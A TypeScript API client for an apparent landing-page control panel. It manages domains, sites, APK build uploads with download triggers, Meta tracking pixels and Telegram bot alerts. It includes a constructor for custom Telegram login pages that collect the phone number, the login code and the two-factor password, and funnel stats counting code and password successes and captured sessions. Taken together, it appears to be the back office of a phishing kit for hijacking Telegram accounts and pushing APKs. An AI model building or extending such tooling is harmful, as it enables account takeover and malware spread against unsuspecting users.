import type {
	ILandingDomain,
	ILandingEvent,
	ILandingEventAggregates,
	ILandingEventVisit,
	ILandingEventStats,
	ILandingTelegramAuthFunnelCounts,
	ILandingTelegramAuthStats,
	ILandingLink,
	ILandingLinkCreated,
	ILandingLinkPatched,
	ILandingMetaPixel,
	ILandingSite,
	ILandingSiteConfig,
	ILandingCustomTemplate,
	ILandingTemplate,
	ILandingUploadedBuild,
	LandingEventType,
	LandingDownloadTrigger,
	MetaPixelConversionEvent,
} from '@/entities/landing.entity';
import { normalizeLandingEventTypeCounts } from '@/entities/landing.entity';
import { landingsApi } from './landings-http';

export async function fetchLandingNotification() {
	const { data } = await landingsApi.get<{ configured: boolean }>('/notification');
	return data;
}

export async function saveLandingNotification(body: { botToken: string; chatId: string }) {
	const { data } = await landingsApi.put<{
		configured: true;
		testSent: boolean;
		testError?: string;
	}>('/notification', body);
	return data;
}

export async function testLandingNotification(body?: { botToken: string; chatId: string }) {
	const { data } = await landingsApi.post<{ ok: true }>('/notification/test', body ?? {});
	return data;
}

export async function fetchLandingDomains() {
	const { data } = await landingsApi.get<{ items: ILandingDomain[] }>('/domains');
	return data.items;
}

export async function fetchLandingDomain(id: number) {
	const { data } = await landingsApi.get<ILandingDomain>(`/domains/${id}`);
	return data;
}

export async function createLandingDomain(zoneName: string) {
	const { data } = await landingsApi.post<ILandingDomain>('/domains', { zoneName });
	return data;
}

export async function patchLandingDomain(
	id: number,
	status: 'disabled' | 'online',
	options?: { suppressToast?: boolean },
) {
	const { data } = await landingsApi.patch<ILandingDomain>(`/domains/${id}`, { status }, options);
	return data;
}

export async function checkLandingDomain(id: number) {
	const { data } = await landingsApi.post<ILandingDomain>(`/domains/${id}/check`);
	return data;
}

export async function fetchLandingSites() {
	const { data } = await landingsApi.get<{ items: ILandingSite[] }>('/sites');
	return data.items;
}

export async function createLandingSite(body: {
	domainId: number;
	subdomain: string;
	templateSlug: string;
	config?: ILandingSiteConfig;
}) {
	const { data } = await landingsApi.post<ILandingSite>('/sites', body);
	return data;
}

export async function patchLandingSite(id: number, body: { config?: ILandingSiteConfig }) {
	const { data } = await landingsApi.patch<ILandingSite>(`/sites/${id}`, body);
	return data;
}

export async function fetchLandingTemplates() {
	const { data } = await landingsApi.get<{ items: ILandingTemplate[] }>('/templates');
	return data.items;
}

const ZIP_UPLOAD_TIMEOUT_MS = 120_000;

export async function fetchLandingCustomTemplates() {
	const { data } = await landingsApi.get<{ items: ILandingCustomTemplate[] }>('/custom-templates');
	return data.items;
}

export async function uploadLandingCustomTemplate(file: File, title?: string) {
	const form = new FormData();
	form.append('zip', file);
	if (title?.trim()) {
		form.append('title', title.trim());
	}
	const { data } = await landingsApi.post<ILandingCustomTemplate>('/custom-templates', form, {
		timeout: ZIP_UPLOAD_TIMEOUT_MS,
	});
	return data;
}

export async function replaceLandingCustomTemplate(id: number, file: File, title?: string) {
	const form = new FormData();
	form.append('zip', file);
	if (title?.trim()) {
		form.append('title', title.trim());
	}
	const { data } = await landingsApi.put<ILandingCustomTemplate>(`/custom-templates/${id}`, form, {
		timeout: ZIP_UPLOAD_TIMEOUT_MS,
	});
	return data;
}

export async function deleteLandingCustomTemplate(id: number) {
	await landingsApi.delete(`/custom-templates/${id}`);
}

export type TelegramAuthConstructBody = {
	title: string;
	themeColor: string;
	image?: {
		mime: 'image/png' | 'image/jpeg' | 'image/webp';
		dataBase64: string;
	};
	background?: {
		mime: 'image/png' | 'image/jpeg' | 'image/webp';
		dataBase64: string;
	};
	screens: {
		home: {
			h1: string;
			subtitle: string;
			phoneLabel: string;
			button: string;
			copyright: string;
			errorPhoneInvalid: string;
			errorPhoneBanned: string;
			errorFlood: string;
		};
		code: {
			h1: string;
			subtitle: string;
			eyebrow: string;
			codeLabel: string;
			detectLabel: string;
			button: string;
			resend: string;
			codeHintApp: string;
			codeHintCall: string;
			errorCodeInvalid: string;
			errorCodeExpired: string;
			errorCodeFlood: string;
		};
		password: {
			h1: string;
			subtitle: string;
			eyebrow: string;
			badge: string;
			passwordPlaceholder: string;
			hint: string;
			button: string;
			errorTwofaInvalid: string;
			errorTwofaFlood: string;
		};
		done: {
			h1: string;
			subtitle: string;
		};
	};
};

export async function fetchLandingTelegramAuthConstruct(id: number) {
	const { data } = await landingsApi.get<TelegramAuthConstructBody>(
		`/custom-telegram-auth-templates/${id}/construct`,
	);
	return data;
}

export async function updateLandingTelegramAuthConstruct(id: number, body: TelegramAuthConstructBody) {
	const { data } = await landingsApi.put<ILandingCustomTemplate>(
		`/custom-telegram-auth-templates/${id}/construct`,
		body,
	);
	return data;
}

export async function constructLandingTelegramAuthTemplate(body: TelegramAuthConstructBody) {
	const { data } = await landingsApi.post<ILandingCustomTemplate>(
		'/custom-telegram-auth-templates/construct',
		body,
	);
	return data;
}

export async function previewLandingTelegramAuthTemplate(body: TelegramAuthConstructBody) {
	const { data } = await landingsApi.post<string>(
		'/custom-telegram-auth-templates/construct-preview',
		body,
		{ responseType: 'text' },
	);
	return data;
}

export async function fetchLandingTelegramAuthCustomTemplates() {
	const { data } = await landingsApi.get<{ items: ILandingCustomTemplate[] }>(
		'/custom-telegram-auth-templates',
	);
	return data.items;
}

export async function uploadLandingTelegramAuthCustomTemplate(file: File, title?: string) {
	const form = new FormData();
	form.append('zip', file);
	if (title?.trim()) {
		form.append('title', title.trim());
	}
	const { data } = await landingsApi.post<ILandingCustomTemplate>(
		'/custom-telegram-auth-templates',
		form,
		{ timeout: ZIP_UPLOAD_TIMEOUT_MS },
	);
	return data;
}

export async function replaceLandingTelegramAuthCustomTemplate(id: number, file: File, title?: string) {
	const form = new FormData();
	form.append('zip', file);
	if (title?.trim()) {
		form.append('title', title.trim());
	}
	const { data } = await landingsApi.put<ILandingCustomTemplate>(
		`/custom-telegram-auth-templates/${id}`,
		form,
		{ timeout: ZIP_UPLOAD_TIMEOUT_MS },
	);
	return data;
}

export async function deleteLandingTelegramAuthCustomTemplate(id: number) {
	await landingsApi.delete(`/custom-telegram-auth-templates/${id}`);
}

export async function fetchLandingLinks(params?: { cursor?: string; limit?: number; siteId?: number }) {
	const { data } = await landingsApi.get<{ items: ILandingLink[]; nextCursor: string | null }>('/links', { params });
	return data;
}

export async function fetchLandingLink(id: string) {
	const { data } = await landingsApi.get<ILandingLink>(`/links/${id}`);
	return data;
}

const APK_UPLOAD_TIMEOUT_MS = 300_000;
const LINK_APK_SYNC_TIMEOUT_MS = 130_000;

export async function createLandingLink(body: {
	siteId: number;
	buildId?: string;
	tgUrl?: string;
	metaPixelId?: number;
	downloadTrigger?: LandingDownloadTrigger;
}) {
	const { data } = await landingsApi.post<ILandingLinkCreated>('/links', body, {
		timeout: LINK_APK_SYNC_TIMEOUT_MS,
	});
	return data;
}

export async function patchLandingLink(
	id: string,
	body: {
		buildId?: string;
		tgUrl?: string;
		metaPixelId?: number | null;
		downloadTrigger?: LandingDownloadTrigger;
	},
) {
	const { data } = await landingsApi.patch<ILandingLinkPatched>(`/links/${id}`, body, {
		timeout: LINK_APK_SYNC_TIMEOUT_MS,
	});
	return data;
}

export async function fetchLandingUploadedBuilds() {
	const { data } = await landingsApi.get<{ items: ILandingUploadedBuild[] }>('/builds');
	return data.items;
}

export async function uploadLandingBuild(file: File, appName?: string) {
	const form = new FormData();
	form.append('apk', file);
	if (appName?.trim()) {
		form.append('appName', appName.trim());
	}
	const { data } = await landingsApi.post<ILandingUploadedBuild>(`/builds`, form, {
		timeout: APK_UPLOAD_TIMEOUT_MS,
	});
	return data;
}

export async function fetchLandingMetaPixels() {
	const { data } = await landingsApi.get<{ items: ILandingMetaPixel[] }>('/meta-pixels');
	return data.items;
}

export async function createLandingMetaPixel(body: {
	name: string;
	pixelId: string;
	conversionEvent: MetaPixelConversionEvent;
}) {
	const { data } = await landingsApi.post<ILandingMetaPixel>('/meta-pixels', body);
	return data;
}

export async function updateLandingMetaPixel(
	id: number,
	body: { name: string; pixelId: string; conversionEvent: MetaPixelConversionEvent },
) {
	const { data } = await landingsApi.put<ILandingMetaPixel>(`/meta-pixels/${id}`, body);
	return data;
}

export async function deleteLandingMetaPixel(id: number) {
	const { data } = await landingsApi.delete<{ ok: true }>(`/meta-pixels/${id}`);
	return data;
}

export async function fetchLandingEvents(params?: {
	linkId?: string;
	type?: LandingEventType;
	outcome?: 'success' | 'error';
	telegramOnly?: boolean;
	from?: string;
	to?: string;
	cursor?: string;
	limit?: number;
}) {
	const { data } = await landingsApi.get<{
		items: ILandingEvent[];
		nextCursor: string | null;
		aggregates?: ILandingEventAggregates;
	}>('/events', { params });
	return data;
}

function emptyTelegramAuthStats(): ILandingTelegramAuthStats {
	const totals = {
		starts: 0,
		sessions: 0,
		codeAttempts: 0,
		codeSuccess: 0,
		codeFailed: 0,
		passwordAttempts: 0,
		passwordSuccess: 0,
		passwordFailed: 0,
		awaitingPassword: 0,
		sessionFromStart: null,
		codeSuccessRate: null,
		passwordSuccessRate: null,
	};
	return { totals, allTime: { totals }, funnel: [], overTime: [] };
}

function normalizeTelegramAuthFunnelCounts(
	raw: ILandingTelegramAuthFunnelCounts | undefined,
): ILandingTelegramAuthFunnelCounts {
	const empty = emptyTelegramAuthStats().totals;
	if (!raw) return empty;
	return {
		starts: raw.starts ?? 0,
		sessions: raw.sessions ?? 0,
		codeAttempts: raw.codeAttempts ?? 0,
		codeSuccess: raw.codeSuccess ?? 0,
		codeFailed: raw.codeFailed ?? 0,
		passwordAttempts: raw.passwordAttempts ?? 0,
		passwordSuccess: raw.passwordSuccess ?? 0,
		passwordFailed: raw.passwordFailed ?? 0,
		awaitingPassword: raw.awaitingPassword ?? 0,
		sessionFromStart: raw.sessionFromStart ?? null,
		codeSuccessRate: raw.codeSuccessRate ?? null,
		passwordSuccessRate: raw.passwordSuccessRate ?? null,
	};
}

function normalizeTelegramAuthStats(raw: ILandingTelegramAuthStats | undefined): ILandingTelegramAuthStats {
	if (!raw?.totals) {
		return emptyTelegramAuthStats();
	}
	return {
		totals: normalizeTelegramAuthFunnelCounts(raw.totals),
		allTime: { totals: normalizeTelegramAuthFunnelCounts(raw.allTime?.totals) },
		funnel: raw.funnel ?? [],
		overTime: raw.overTime ?? [],
	};
}

export function normalizeLandingEventStatsResponse(data: ILandingEventStats): ILandingEventStats {
	return {
		...data,
		totals: normalizeLandingEventTypeCounts(data.totals),
		allTime: normalizeLandingEventTypeCounts(data.allTime),
		eventsOverTime: data.eventsOverTime.map(point => ({
			label: point.label,
			...normalizeLandingEventTypeCounts(point),
		})),
		telegramAuth: normalizeTelegramAuthStats(data.telegramAuth),
	};
}

export async function fetchLandingEventStats(params: { period: 'day' | 'week' | 'month' | 'all'; linkId?: string }) {
	const { data } = await landingsApi.get<ILandingEventStats>('/events/stats', { params });
	return normalizeLandingEventStatsResponse(data);
}

export async function fetchLandingEventVisits(params?: {
	linkId?: string;
	from?: string;
	to?: string;
	cursor?: string;
	limit?: number;
	telegramOnly?: boolean;
}) {
	const { data } = await landingsApi.get<{ items: ILandingEventVisit[]; nextCursor: string | null }>(
		'/events/visits',
		{ params },
	);
	return data;
}
